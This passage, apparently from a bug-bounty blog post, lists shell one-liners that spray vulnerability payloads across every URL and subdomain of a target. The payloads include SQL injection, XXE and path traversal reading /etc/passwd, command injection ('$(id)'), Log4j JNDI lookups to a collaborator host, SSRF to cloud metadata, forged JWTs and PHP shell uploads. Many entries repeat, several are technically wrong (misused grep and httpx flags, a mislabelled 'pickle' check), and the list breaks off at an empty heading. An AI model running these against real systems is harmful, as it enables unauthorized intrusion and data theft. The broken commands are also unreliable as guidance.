cat all_urls.txt | gf crlf | qsreplace '%0D%0ASet-Cookie:crlf=found' | httpx -silent -fr 'crlf=found' -o crlf_injections.txt
Enter fullscreen mode Exit fullscreen mode

CMS Detection (for Known Exploits)

subfinder -d target.com | httpx -silent -tech-detect -o cms_detected.txt
Enter fullscreen mode Exit fullscreen mode

Missing Security Headers (Easy Win)

cat all_urls.txt | httpx -silent -H 'X-Content-Type-Options' -H 'X-Frame-Options' -H 'Content-Security-Policy' -H 'Strict-Transport-Security' | grep -E "missing|absent" | tee weak_headers.txt
Enter fullscreen mode Exit fullscreen mode

Cache Poisoning Detection

cat all_urls.txt | gf cache | qsreplace 'X-Forwarded-Host: evil.com' | httpx -silent -fr 'evil.com' -o cache_poisoning.txt
Enter fullscreen mode Exit fullscreen mode

Client-Side Prototype Pollution

cat all_js_urls.txt | xargs -I{} curl -s {} | grep -E 'prototype|__proto__|constructor' | tee client_side_prototype.txt
Enter fullscreen mode Exit fullscreen mode

Sensitive Image Exposures (Backups/Logs)

subfinder -d target.com | httpx -silent -path-list <(echo -e '/backup.jpg\n/screenshot.png\n/db-dump.png\n/log.png') -mc 200 -o exposed_images.txt
Enter fullscreen mode Exit fullscreen mode

BONUS — Full Recon Workflow One-Liner

subfinder -d target.com | httpx -silent -title -tech-detect | nuclei -silent -t vulnerabilities/ -o all_findings.txt
Enter fullscreen mode Exit fullscreen mode

Log4j Vulnerability Scanner (JNDI Injection)

cat all_urls.txt | qsreplace '${jndi:ldap://your-collab-url.burpcollaborator.net/a}' | httpx -silent -o log4j_candidates.txt
Enter fullscreen mode Exit fullscreen mode

AWS S3 Bucket Takeover (Misconfigured Buckets)

subfinder -d target.com | sed 's/$/.s3.amazonaws.com/' | httpx -silent -mc 200 -o open_buckets.txt
Enter fullscreen mode Exit fullscreen mode

JWT Secrets Brute Force (Weak Signing Key)

cat jwt_tokens.txt | jwt-cracker -w wordlist.txt -t 50 -o weak_jwt_keys.txt
Enter fullscreen mode Exit fullscreen mode

CORS Misconfiguration Finder

cat all_urls.txt | httpx -silent -H 'Origin: https://evil.com' -hdrs | grep -E "Access-Control-Allow-Origin: \*|Access-Control-Allow-Origin: https://evil.com" | tee cors_vulns.txt
Enter fullscreen mode Exit fullscreen mode

GCP Bucket Enumeration (Google Cloud)

subfinder -d target.com | sed 's/$/.storage.googleapis.com/' | httpx -silent -mc 200 -o open_gcp_buckets.txt
Enter fullscreen mode Exit fullscreen mode

Python Pickle Injection Check (Deserialization Bug)

cat all_urls.txt | gf deserialize | qsreplace 'evil_pickle_payload_here' | httpx -silent -o pickle_vulns.txt
Enter fullscreen mode Exit fullscreen mode

SQL Injection (Error-Based Detection)

cat all_urls.txt | gf sqli | qsreplace "' OR 1=1 --" | httpx -silent -fr 'syntax|sql|error|database' -o sql_injection.txt
Enter fullscreen mode Exit fullscreen mode

Version Disclosure Detection

cat all_urls.txt | httpx -silent -hdrs | grep -Ei 'server:|x-powered-by:' | tee version_disclosures.txt
Enter fullscreen mode Exit fullscreen mode

CRLF Injection with Cookie Injection Check

cat all_urls.txt | gf crlf | qsreplace '%0d%0aSet-Cookie:+crlf=found' | httpx -silent -fr 'crlf=found' -o crlf_cookie_injection.txt
Enter fullscreen mode Exit fullscreen mode

Directory Traversal Finder

cat all_urls.txt | qsreplace '../../etc/passwd' | httpx -silent -fr 'root:x' -o dir_traversal.txt
Enter fullscreen mode Exit fullscreen mode

Azure Storage Enumeration

subfinder -d target.com | sed 's/$/.blob.core.windows.net/' | httpx -silent -mc 200 -o open_azure_blobs.txt
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeover Detection (CNAME Pointing to Unclaimed Services)

subfinder -d target.com | dnsx -silent -a -resp-only | nuclei -silent -t takeover-detection/ -o takeover_candidates.txt
Enter fullscreen mode Exit fullscreen mode

Unauthorized Admin Panel Access

cat all_urls.txt | httpx -silent -path-list <(echo -e '/admin\n/dashboard\n/cms\n/panel\n/root\n/console') -mc 200 -o exposed_admins.txt
Enter fullscreen mode Exit fullscreen mode

IPv6 Asset Discovery (Many Orgs Forget This)

subfinder -d target.com | dnsx -silent -aaaa -resp-only | tee ipv6_assets.txt
Enter fullscreen mode Exit fullscreen mode

Template Injection Finder (SSTI)

cat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_vulns.txt
Enter fullscreen mode Exit fullscreen mode

Open Redirect Detection

cat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'Location: https://evil.com' -o open_redirects.txt
Enter fullscreen mode Exit fullscreen mode

Server-Side Request Forgery (SSRF)

cat all_urls.txt | gf ssrf | qsreplace 'http://your-burpcollab-url.burpcollaborator.net' | httpx -silent -o ssrf_candidates.txt
Enter fullscreen mode Exit fullscreen mode

Exposed .git Repositories (Code Leakage)

cat subdomains.txt | httpx -silent -path '/.git/config' -mc 200 -o exposed_git_repos.txt
Enter fullscreen mode Exit fullscreen mode

Command Injection Finder

cat all_urls.txt | gf cmd-injection | qsreplace '&& id' | httpx -silent -fr 'uid=' -o cmd_injection.txt
Enter fullscreen mode Exit fullscreen mode

Prototype Pollution Detection

cat all_urls.txt | qsreplace '__proto__[exploit]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt
Enter fullscreen mode Exit fullscreen mode

Email/PII Leakage in Responses

cat all_urls.txt | httpx -silent -fr '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' -o leaked_emails.txt
Enter fullscreen mode Exit fullscreen mode

Host Header Injection

cat all_urls.txt | httpx -silent -H 'Host: attacker.com' -fr 'attacker.com' -o host_header_injection.txt
Enter fullscreen mode Exit fullscreen mode

Path Traversal (Windows)

cat all_urls.txt | qsreplace 'C:/Windows/win.ini' | httpx -silent -fr 'for 16-bit app support' -o windows_traversal.txt
Enter fullscreen mode Exit fullscreen mode

Sensitive Files (Backup Files Exposure)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/.env\n/config.php.bak\n/database.yml\n/backup.zip') -mc 200 -o sensitive_files.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Config Panels (CMS, Jenkins, PhpMyAdmin)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/phpmyadmin\n/jenkins\n/wp-admin\n/admin\n/cpanel') -mc 200 -o exposed_panels.txt
Enter fullscreen mode Exit fullscreen mode

Hardcoded API Keys in JS Files

cat all_js_urls.txt | xargs -I{} curl -s {} | grep -E 'apiKey|apikey|secret|token|bearer' | tee hardcoded_api_keys.txt
Enter fullscreen mode Exit fullscreen mode

Spring Boot Actuator Exposed Endpoints

cat subdomains.txt | httpx -silent -path '/actuator/health' -mc 200 -o exposed_actuators.txt
Enter fullscreen mode Exit fullscreen mode

Gopher SSRF (Redis/SMTP Attack)

cat all_urls.txt | qsreplace 'gopher://127.0.0.1:6379/_COMMAND' | httpx -silent -o gopher_ssrf_candidates.txt
Enter fullscreen mode Exit fullscreen mode

HTML Injection (Reflected)

cat all_urls.txt | gf xss | qsreplace '<h1>PWNED</h1>' | httpx -silent -fr '<h1>PWNED</h1>' -o html_injection.txt
Enter fullscreen mode Exit fullscreen mode

API Token Misconfiguration (Bearer Token Disclosure)

cat all_urls.txt | httpx -silent -hdrs | grep -i 'authorization: Bearer' | tee bearer_tokens.txt
Enter fullscreen mode Exit fullscreen mode

WordPress Plugin Vulnerabilities (Outdated Plugins)

nuclei -l subdomains.txt -t cves/wordpress/ -o wp_vulns.txt
Enter fullscreen mode Exit fullscreen mode

Broken Link Hijacking (Subdomain Takeover via Broken Links)

cat subdomains.txt | gau | grep -E '\.(js|css|png|jpg|jpeg|gif|svg|woff|ttf|ico)' | httpx -silent -status-code -o broken_links.txt
Enter fullscreen mode Exit fullscreen mode

CRLF Injection (HTTP Response Splitting)

cat all_urls.txt | qsreplace '%0d%0aSet-Cookie:crlftest=crlfpoc' | httpx -silent -fr 'crlftest=crlfpoc' -o crlf_injection.txt
Enter fullscreen mode Exit fullscreen mode

Cloud Storage Misconfig (AWS S3 Bucket Public Access)

cat subdomains.txt | nuclei -t misconfiguration/ -o s3_buckets.txt
Enter fullscreen mode Exit fullscreen mode

HTTP Method Fuzzing (Check PUT/DELETE enabled)

cat subdomains.txt | httpx -silent -methods PUT,DELETE -mc 200 -o risky_methods.txt
Enter fullscreen mode Exit fullscreen mode

GraphQL Misconfig (Introspection Enabled)

cat subdomains.txt | httpx -silent -path '/graphql' -mc 200 -fr 'Introspection Query' -o graphql_introspection.txt
Enter fullscreen mode Exit fullscreen mode

DNS Zone Transfer (AXFR Check)

for domain in $(cat subdomains.txt); do dig axfr $domain @ns1.$domain; done
Enter fullscreen mode Exit fullscreen mode

CSP Bypass/Weak CSP Check

cat subdomains.txt | nuclei -t security-misconfiguration/csp-missing.yaml -o weak_csp.txt
Enter fullscreen mode Exit fullscreen mode

Backup Files (Git, SQL Dumps, Zip Archives)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.sql\n/.git/config\n/backup.zip') -mc 200 -o backup_leaks.txt
Enter fullscreen mode Exit fullscreen mode

Session Fixation (Check if sessionID can be set)

cat all_urls.txt | qsreplace 'sessionid=abc123' | httpx -silent -fr 'sessionid=abc123' -o session_fixation.txt
Enter fullscreen mode Exit fullscreen mode

JWT Secret Bruteforce (Weak Signing Keys)

cat subdomains.txt | jwt_tool -I -bruteforce wordlist.txt -o weak_jwt_keys.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Email Addresses in Webpages

cat all_urls.txt | httpx -silent -fr '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' -o leaked_emails.txt
Enter fullscreen mode Exit fullscreen mode

XML External Entity Injection (XXE)

cat all_urls.txt | gf xxe | qsreplace '<?xml version="1.0"?><!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>' | httpx -silent -fr 'root:x' -o xxe_poc.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Directory Listings (Misconfig)

cat subdomains.txt | httpx -silent -path '/' -fr 'Index of' -o open_dirs.txt
Enter fullscreen mode Exit fullscreen mode

Kubernetes Dashboard Exposure

cat subdomains.txt | httpx -silent -path '/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/' -mc 200 -o exposed_k8s_dashboard.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Swagger API (Public API Docs)

cat subdomains.txt | httpx -silent -path '/swagger-ui.html' -mc 200 -o exposed_swagger.txt
Enter fullscreen mode Exit fullscreen mode

Open Redirect Detection

cat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt
Enter fullscreen mode Exit fullscreen mode

Directory Traversal (../ Exploit)

cat all_urls.txt | gf lfi | qsreplace '../etc/passwd' | httpx -silent -fr 'root:x' -o directory_traversal.txt
Enter fullscreen mode Exit fullscreen mode

Server-Side Template Injection (SSTI)

cat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_found.txt
Enter fullscreen mode Exit fullscreen mode

Insecure Cross-Origin Resource Sharing (CORS)

cat subdomains.txt | httpx -silent -H "Origin: https://evil.com" -fr 'https://evil.com' -o weak_cors.txt
Enter fullscreen mode Exit fullscreen mode

SQL Injection - Quick Payload Fire

cat all_urls.txt | gf sqli | qsreplace "' OR '1'='1" | httpx -silent -fr 'error' -o sqli_poc.txt
Enter fullscreen mode Exit fullscreen mode

Backup Config Files (env/config.php)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/.env\n/config.php\n/settings.py\n/config.json') -mc 200 -o leaked_configs.txt
Enter fullscreen mode Exit fullscreen mode

SSRF (Server-Side Request Forgery)

cat all_urls.txt | gf ssrf | qsreplace 'http://burpcollaborator.net' | httpx -silent -o ssrf_candidates.txt
Enter fullscreen mode Exit fullscreen mode

File Upload (Potential Upload Endpoints)

cat all_urls.txt | gf upload | httpx -silent -mc 200 -o upload_endpoints.txt
Enter fullscreen mode Exit fullscreen mode

Sensitive Data Exposure (Credit Card, API Keys)

cat all_urls.txt | httpx -silent -fr 'sk_live|pk_live|eyJhbGci|-----BEGIN PRIVATE KEY-----|4[0-9]{12}(?:[0-9]{3})?' -o sensitive_data.txt
Enter fullscreen mode Exit fullscreen mode

JWT Token Leak (in URL or Response)

cat all_urls.txt | httpx -silent -fr 'eyJ' -o jwt_leaks.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Database Panels (phpMyAdmin, Mongo, etc)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/phpmyadmin/\n/admin/\n/mongo-express/') -mc 200 -o exposed_db_panels.txt
Enter fullscreen mode Exit fullscreen mode

GIT Repo Exposure

cat subdomains.txt | httpx -silent -path '/.git/config' -mc 200 -o exposed_git.txt
Enter fullscreen mode Exit fullscreen mode

Debug Pages (dev.php/test.php)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/test.php\n/dev.php\n/debug.php') -mc 200 -o debug_pages.txt
Enter fullscreen mode Exit fullscreen mode

Exposed API Keys in JavaScript Files

cat subdomains.txt | gau | grep '\.js$' | httpx -silent -fr 'AIza|sk_live|ghp_' -o api_key_leaks.txt
Enter fullscreen mode Exit fullscreen mode

Unsafe File Upload (PHP Reverse Shell Upload)

cat upload_endpoints.txt | qsreplace 'file=shell.php' | httpx -silent -mc 200 -o shell_upload.txt
Enter fullscreen mode Exit fullscreen mode

Clickjacking (Missing X-Frame-Options)

cat subdomains.txt | httpx -silent -header 'X-Frame-Options' -o missing_xfo.txt
Enter fullscreen mode Exit fullscreen mode

HTTP Parameter Pollution (Duplicate Params)

cat all_urls.txt | qsreplace 'param1=value1&param1=value2' | httpx -silent -mc 200 -o hpp_candidates.txt
Enter fullscreen mode Exit fullscreen mode

Server Info Disclosure (Version Leaks)

cat subdomains.txt | httpx -silent -sc -title -o server_versions.txt
Enter fullscreen mode Exit fullscreen mode

Password Reset Token Leak in URL

cat all_urls.txt | grep -i 'reset' | grep -E 'token=|key=' | httpx -silent -o reset_token_leak.txt
Enter fullscreen mode Exit fullscreen mode

Host Header Injection

cat subdomains.txt | httpx -silent -H "Host: attacker.com" -fr "attacker.com" -o host_header_injection.txt
Enter fullscreen mode Exit fullscreen mode

Web Cache Poisoning

cat all_urls.txt | qsreplace 'X-Original-URL: /evil' | httpx -silent -fr 'evil' -o cache_poisoning.txt
Enter fullscreen mode Exit fullscreen mode

AWS Bucket Takeover (S3)

cat subdomains.txt | awk -F. '{print $1"."$2}' | while read domain; do aws s3 ls s3://$domain --no-sign-request; done
Enter fullscreen mode Exit fullscreen mode

Exposed Secret Tokens in Robots.txt

cat subdomains.txt | httpx -silent -path /robots.txt -fr 'token|key|secret' -o secret_leak_robots.txt
Enter fullscreen mode Exit fullscreen mode

Email Injection in Contact Forms

cat contact_forms_urls.txt | qsreplace 'email=attacker%0A%0DCC%3Aevil@attacker.com' | httpx -silent -mc 200 -o email_injection.txt
Enter fullscreen mode Exit fullscreen mode

PHP Info Disclosure (info.php)

cat subdomains.txt | httpx -silent -path /info.php -mc 200 -o phpinfo_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Debug Endpoints Exposure (Spring Boot Actuator)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/actuator/health\n/actuator/env\n/actuator/mappings') -mc 200 -o exposed_actuator.txt
Enter fullscreen mode Exit fullscreen mode

Directory Listing Enabled

cat subdomains.txt | httpx -silent -path '/' -fr 'Index of' -o directory_listing.txt
Enter fullscreen mode Exit fullscreen mode

Kubernetes Dashboard Exposure

cat subdomains.txt | httpx -silent -path '/#/login' -mc 200 -o kube_dashboard_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Log File Exposure (access.log, error.log)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/access.log\n/error.log') -mc 200 -o exposed_logs.txt
Enter fullscreen mode Exit fullscreen mode

Backup Files in Root (zip, tar, sql)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/db.sql\n/site.tar.gz') -mc 200 -o backup_files.txt
Enter fullscreen mode Exit fullscreen mode

Insecure Direct Object Reference (IDOR)

cat idor_urls.txt | qsreplace 'user_id=123' | httpx -silent -mc 200 -o idor_candidates.txt
Enter fullscreen mode Exit fullscreen mode

CSP Bypass (Missing or Weak CSP)

cat subdomains.txt | httpx -silent -H 'Content-Security-Policy' -o weak_csp.txt
Enter fullscreen mode Exit fullscreen mode

Open API Endpoints Discovery

cat subdomains.txt | httpx -silent -path /swagger.json -mc 200 -o swagger_exposed.txt
Enter fullscreen mode Exit fullscreen mode

OAuth Token Leak in URLs

cat all_urls.txt | grep -i 'access_token=' -o oauth_token_leaks.txt
Enter fullscreen mode Exit fullscreen mode

GraphQL Endpoint Discovery

cat subdomains.txt | httpx -silent -path /graphql -mc 200 -o graphql_found.txt
Enter fullscreen mode Exit fullscreen mode

Prototype Pollution via Params

cat all_urls.txt | qsreplace '__proto__[test]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt
Enter fullscreen mode Exit fullscreen mode

WordPress XML-RPC Abuse

cat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o xmlrpc_found.txt
Enter fullscreen mode Exit fullscreen mode

🔐 JWT None Algorithm Bypass Check

cat all_urls.txt | qsreplace 'token=eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -mc 200 -o jwt_none_bypass.txt
Enter fullscreen mode Exit fullscreen mode

🚀 Session Fixation via Set-Cookie

cat subdomains.txt | httpx -silent -H "Cookie: sessionid=attacker-session" -o session_fixation.txt
Enter fullscreen mode Exit fullscreen mode

🛜 Open Redirects

cat urls.txt | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt
Enter fullscreen mode Exit fullscreen mode

🗂️ Exposed .git Folder

cat subdomains.txt | httpx -silent -path /.git/HEAD -mc 200 -o git_exposed.txt
Enter fullscreen mode Exit fullscreen mode

🌍 Exposed .env Files (Secrets Leak)

cat subdomains.txt | httpx -silent -path /.env -mc 200 -o env_leaks.txt
Enter fullscreen mode Exit fullscreen mode

🧬 GraphQL Introspection Enabled

cat subdomains.txt | httpx -silent -path /graphql -x POST -body '{"query":"query IntrospectionQuery { __schema { types { name } } }"}' -fr 'data' -o graphql_introspection.txt
Enter fullscreen mode Exit fullscreen mode

Insecure CORS (Wildcard or Null)

cat subdomains.txt | httpx -silent -H "Origin: https://evil.com" -fr "https://evil.com" -o insecure_cors.txt
Enter fullscreen mode Exit fullscreen mode

📂 Backup Files Discovery (.zip, .sql, etc)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/db.sql\n/site_backup.tar.gz') -mc 200 -o backup_files.txt
Enter fullscreen mode Exit fullscreen mode

📊 Admin Panels Discovery

cat subdomains.txt | httpx -silent -path-list <(echo -e '/admin\n/dashboard\n/panel\n/cp') -mc 200 -o admin_panels.txt
Enter fullscreen mode Exit fullscreen mode

💀 Server Side Template Injection (SSTI)

cat all_urls.txt | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti.txt
Enter fullscreen mode Exit fullscreen mode

📋 Path Traversal (../ Disclosure)

cat all_urls.txt | qsreplace '../../../../etc/passwd' | httpx -silent -fr 'root:x' -o path_traversal.txt
Enter fullscreen mode Exit fullscreen mode

🐍 Python Pickle Injection (if Flask or Python backend)

cat all_urls.txt | qsreplace '__class__=os.system&cmd=id' | httpx -silent -fr 'uid=' -o pickle_injection.txt
Enter fullscreen mode Exit fullscreen mode

CRLF Injection (Header Splitting)

cat all_urls.txt | qsreplace '%0d%0aHeader: evil' | httpx -silent -fr 'Header: evil' -o crlf.txt
Enter fullscreen mode Exit fullscreen mode

💾 Exposed Database Admin Panels

cat subdomains.txt | httpx -silent -path-list <(echo -e '/phpmyadmin\n/adminer\n/sql') -mc 200 -o db_admin_panels.txt
Enter fullscreen mode Exit fullscreen mode

🧱 File Upload Misconfig (Can upload PHP/JSP)

cat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.php' {} -s -o - | grep 'shell_exec' -B 2
Enter fullscreen mode Exit fullscreen mode

🕵️‍♂️ Cloud Metadata API Exposure (AWS/GCP)

cat subdomains.txt | httpx -silent -path /latest/meta-data/ -mc 200 -o metadata_exposed.txt
Enter fullscreen mode Exit fullscreen mode

💣 CRLF in Redirect Location Header

cat urls.txt | qsreplace '%0d%0aLocation:%20https://evil.com' | httpx -silent -fr 'evil.com' -o crlf_redirect.txt
Enter fullscreen mode Exit fullscreen mode

📑 XSS in JSON Response (Reflected)

cat urls.txt | qsreplace '"><script>alert(1)</script>' | httpx -silent -fr 'alert(1)' -o xss.json.txt
Enter fullscreen mode Exit fullscreen mode

🔌 Exposed Internal IPs (Debug Responses)

cat urls.txt | httpx -silent -fr '10\.|172\.|192\.168\.' -o internal_ips.txt
Enter fullscreen mode Exit fullscreen mode

🌐 Misconfigured WAF Bypass

cat urls.txt | qsreplace '><script>alert(1)</script>' | httpx -silent -mc 403 -o waf_detected.txt
cat waf_detected.txt | qsreplace '><script>alert(1)</script>' | anew bypass_payloads.txt
cat bypass_payloads.txt | httpx -silent -mc 200 -o waf_bypass.txt
Enter fullscreen mode Exit fullscreen mode

📤 Information Disclosure via Verb Tampering

cat subdomains.txt | httpx -silent -method OPTIONS -o verb_tampering.txt
Enter fullscreen mode Exit fullscreen mode

🧰 S3 Bucket Discovery via Subdomain Bruteforce

cat subdomains.txt | awk -F. '{print $1"."$2}' | xargs -I {} aws s3 ls s3://{} --no-sign-request 2>/dev/null | tee s3_buckets.txt
Enter fullscreen mode Exit fullscreen mode

💧 AWS S3 Bucket Takeover (Subdomain Takeover)

cat subdomains.txt | xargs -I {} host {} | grep 'amazonaws.com' | awk '{print $1}' | httpx -silent -mc 404 -o vulnerable_s3.txt
Enter fullscreen mode Exit fullscreen mode

📜 Exposed Swagger/OpenAPI Endpoints

cat subdomains.txt | httpx -silent -path-list <(echo -e '/swagger.json\n/openapi.json\n/api-docs') -mc 200 -o openapi_endpoints.txt
Enter fullscreen mode Exit fullscreen mode

Prototype Pollution in Query Params

cat urls.txt | qsreplace '__proto__[evil]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt
Enter fullscreen mode Exit fullscreen mode

💉 SQL Injection (Basic Reflex Check)

cat urls.txt | qsreplace "'" | httpx -silent -fr 'SQL syntax' -o sqli.txt
Enter fullscreen mode Exit fullscreen mode

🔗 SSRF (Internal IP Scan via Open Redirect or URL Input)

cat urls.txt | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id' -o ssrf_aws_metadata.txt
Enter fullscreen mode Exit fullscreen mode

🔥 Spring Boot Actuator Exposure (DevOps Misconfig)

cat subdomains.txt | httpx -silent -path /actuator/env -mc 200 -o springboot_actuator_exposed.txt
Enter fullscreen mode Exit fullscreen mode

JWT None Algorithm Bypass

cat urls.txt | qsreplace 'eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -fr 'admin' -o jwt_none_bypass.txt
Enter fullscreen mode Exit fullscreen mode

Firebase Misconfig (Open Firebase Databases)

cat subdomains.txt | sed 's/$/.firebaseio.com/' | httpx -silent -path /.json -mc 200 -o open_firebase.txt
Enter fullscreen mode Exit fullscreen mode

📡 GraphQL Playground/Console Discovery

cat subdomains.txt | httpx -silent -path /graphiql -mc 200 -o graphql_console.txt
Enter fullscreen mode Exit fullscreen mode

⚠️ SOAP Service Discovery (Old APIs)

cat subdomains.txt | httpx -silent -path /services.wsdl -mc 200 -o soap_services.txt
Enter fullscreen mode Exit fullscreen mode

📬 Email Injection via Contact Forms

cat urls.txt | qsreplace 'test%0d%0aBCC:evil@attacker.com' | httpx -silent -fr 'evil@attacker.com' -o email_injection.txt
Enter fullscreen mode Exit fullscreen mode

🕵️‍♂️ GCP Bucket Enumeration (Public Buckets)

cat subdomains.txt | sed 's/$/.storage.googleapis.com/' | httpx -silent -mc 200 -o gcp_buckets.txt
Enter fullscreen mode Exit fullscreen mode

🛠️ Deserialization via File Upload (PHP/JAVA Specific)

cat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.ser' {} -s -o - | grep 'java.lang' -B 2
Enter fullscreen mode Exit fullscreen mode

🔗 IDOR Detection via Incremental IDs

cat urls.txt | qsreplace 'id=123' | anew incremental_ids.txt
cat incremental_ids.txt | qsreplace 'id=124' | httpx -silent -fr 'profile' -o idor_found.txt
Enter fullscreen mode Exit fullscreen mode

Azure Blob Storage Enumeration

cat subdomains.txt | sed 's/$/.blob.core.windows.net/' | httpx -silent -mc 200 -o azure_blobs.txt
Enter fullscreen mode Exit fullscreen mode

🎯 XXE Injection via File Upload (XML Files)

cat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.xml' {} -s -o - | grep 'root:' -B 2
Enter fullscreen mode Exit fullscreen mode

📊 Exposed Kibana Dashboards (DevOps)

cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o exposed_kibana.txt
Enter fullscreen mode Exit fullscreen mode

CVE Scanner for Web Targets (Nuclei One-Liner)

cat subdomains.txt | nuclei -silent -t cves/ -o found_cves.txt
Enter fullscreen mode Exit fullscreen mode

📈 LFI via Log Poisoning

cat urls.txt | qsreplace '../../../../../../../../var/log/nginx/access.log' | httpx -silent -fr 'GET /' -o log_poisoning_lfi.txt
Enter fullscreen mode Exit fullscreen mode

🗄️ Exposed Jenkins Console (DevOps)

cat subdomains.txt | httpx -silent -path /script -mc 200 -o exposed_jenkins.txt
Enter fullscreen mode Exit fullscreen mode

📂 Exposed Git Directories (Sensitive Files in .git)

cat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git.txt
Enter fullscreen mode Exit fullscreen mode

🔥 Open Kibana (Cloud Misconfiguration)

cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt
Enter fullscreen mode Exit fullscreen mode

📤 Exposed Env Files (Secrets Disclosure)

cat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env.txt
Enter fullscreen mode Exit fullscreen mode

🗂️ Directory Listing Enabled (Info Disclosure)

cat subdomains.txt | httpx -silent -path / -fr 'Index of /' -o dir_listing.txt
Enter fullscreen mode Exit fullscreen mode

💉 Command Injection via Input Parameters

cat urls.txt | qsreplace '$(id)' | httpx -silent -fr 'uid=' -o command_injection.txt
Enter fullscreen mode Exit fullscreen mode

🪄 CORS Misconfiguration Check (Origin Reflection)

cat urls.txt | httpx -silent -H 'Origin: https://evil.com' -fr 'https://evil.com' -o cors_misconfig.txt
Enter fullscreen mode Exit fullscreen mode

🔗 Open Redirect (URL Parameter Test)

cat urls.txt | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirect.txt
Enter fullscreen mode Exit fullscreen mode

Backup/Old Files Exposure

cat subdomains.txt | httpx -silent -path-list <(echo -e '/index.php~\n/config.old\n/database.bak') -mc 200 -o exposed_backup_files.txt
Enter fullscreen mode Exit fullscreen mode

🕵️ Clickjacking (Missing X-Frame-Options)

cat subdomains.txt | httpx -silent -hx -o headers.txt
cat headers.txt | grep -E "x-frame-options|X-Frame-Options" -i -L > clickjacking_vulnerable.txt
Enter fullscreen mode Exit fullscreen mode

⚙️ Misconfigured Jenkins Instances

cat subdomains.txt | httpx -silent -path /script -mc 200 -o exposed_jenkins.txt
Enter fullscreen mode Exit fullscreen mode

💾 Open MongoDB Instances (Cloud Exposure)

cat ips.txt | xargs -I{} sh -c 'echo {} && mongosh --host {} --eval "db.stats()"' 2>/dev/null | tee open_mongodb.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Private Keys (Accidental Disclosure)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/id_rsa\n/keys/privkey.pem\n/.ssh/id_rsa') -mc 200 -o exposed_keys.txt
Enter fullscreen mode Exit fullscreen mode

Insecure JSONP Endpoints (Callback Hijacking)

cat urls.txt | qsreplace 'callback=alert(document.domain)' | httpx -silent -fr 'alert(document.domain)' -o jsonp_vulns.txt
Enter fullscreen mode Exit fullscreen mode

Exposed phpinfo() Files (Info Disclosure)

cat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o exposed_phpinfo.txt
Enter fullscreen mode Exit fullscreen mode

RCE via Deserialization (Java/PHP Payloads)

cat upload_urls.txt | xargs -I{} curl -X POST -F 'file=@payload.ser' {} -s | grep 'java.lang.Runtime' -o rce_found.txt
Enter fullscreen mode Exit fullscreen mode

LFI via Log Files

cat urls.txt | qsreplace '../../../../../../../../var/log/nginx/access.log' | httpx -silent -fr 'GET /' -o log_lfi.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Docker APIs (DevOps Misconfig)

cat ips.txt | xargs -I{} curl -s -X GET "http://{}:2375/images/json" | grep 'Id' -B 2 | tee exposed_docker.txt
Enter fullscreen mode Exit fullscreen mode

Amazon S3 Buckets (Open Buckets)

cat subdomains.txt | sed 's/$/.s3.amazonaws.com/' | httpx -silent -mc 200 -o open_s3_buckets.txt
Enter fullscreen mode Exit fullscreen mode

Open Elasticsearch (DevOps Exposure)

cat ips.txt | xargs -I{} curl -s "http://{}:9200/_cat/indices?v" | grep -v 'master' | tee open_elasticsearch.txt
Enter fullscreen mode Exit fullscreen mode

Backup Files in Web Root

cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 -o found_backups.txt
Enter fullscreen mode Exit fullscreen mode

XSS in reflected parameters (quick check)

cat urls.txt | qsreplace '<script>alert(1)</script>' | httpx -silent -fr '<script>alert(1)</script>' -o xss_reflected.txt
Enter fullscreen mode Exit fullscreen mode

SQL Injection (time-based detection)

